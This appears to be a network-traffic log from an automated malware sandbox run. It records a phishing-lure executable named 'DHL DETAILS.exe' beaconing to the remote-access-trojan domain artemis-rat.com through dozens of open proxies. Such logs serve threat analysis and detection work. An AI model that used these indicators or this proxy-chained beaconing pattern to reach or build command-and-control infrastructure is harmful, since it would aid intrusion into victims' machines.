                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.173614025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.176938057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.177339077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.177598000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1767192.168.2.551126112.5.128.7880606352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.178076029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.333141088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.333336115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.146651983 CET300INHTTP/1.1 400 Bad Request
                                                                                    Server: sws
                                                                                    Date: Sat, 09 Mar 2024 12:16:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.15.6</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1768192.168.2.55369966.228.33.190174646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.200316906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.379981995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1769192.168.2.554648199.102.105.24241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.212424994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1770192.168.2.555265199.58.185.941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.212440968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1771192.168.2.55146641.77.188.131806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.253283024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.380057096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.380307913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.381565094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1772192.168.2.555263195.87.217.7533896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.271410942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1773192.168.2.555266203.222.24.36806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.290282011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1774192.168.2.555248180.250.159.4941536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.294897079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1775192.168.2.551522148.66.130.5350316352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.312752962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1776192.168.2.55443227.65.240.15710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.338351011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1777192.168.2.555107162.0.220.234205236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.343113899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1778192.168.2.55503243.133.136.20888006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.349569082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1779192.168.2.55150651.75.126.150366946352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.351291895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.520829916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.520560980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.646347046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1780192.168.2.5552691.15.62.1256786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.365135908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1781192.168.2.555264103.66.177.17322516352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.365947962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1782192.168.2.55500136.95.235.1836296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.383507967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1783192.168.2.553815162.241.46.6414426352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.383713007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1784192.168.2.554123142.93.2.22680006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.448983908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.676642895 CET19INHTTP/1.0 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1785192.168.2.555268211.93.2.19073026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.469743013 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:21.940397978 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1786192.168.2.55515451.89.173.40204356352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.492049932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.567557096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.567670107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.677371979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1787192.168.2.555057189.240.60.16890906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.511181116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.009825945 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1788192.168.2.55527194.130.94.45806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.526720047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1789192.168.2.555273114.156.77.10780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.527703047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1790192.168.2.555270106.105.218.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.576721907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1791192.168.2.5552675.44.42.115583866352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.579336882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    1792192.168.2.555279199.102.105.2424145
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.582624912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1793192.168.2.55446027.65.114.810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.585848093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1794192.168.2.553879192.99.207.129634046352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.595535994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.676877022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.677004099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.677786112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1795192.168.2.55496272.206.181.12341456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.595536947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1796192.168.2.553946172.93.111.87432096352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.595918894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1797192.168.2.55162652.151.210.20490006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.610522985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1798192.168.2.55527543.155.170.35156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.642276049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1799192.168.2.555276219.71.216.78806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.642786026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.955982924 CET340INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:21 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1800192.168.2.55398345.225.204.89996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:21.650355101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1801192.168.2.553802154.118.228.212806352C:\Users\user\Desktop\DHL DETAILS.exe
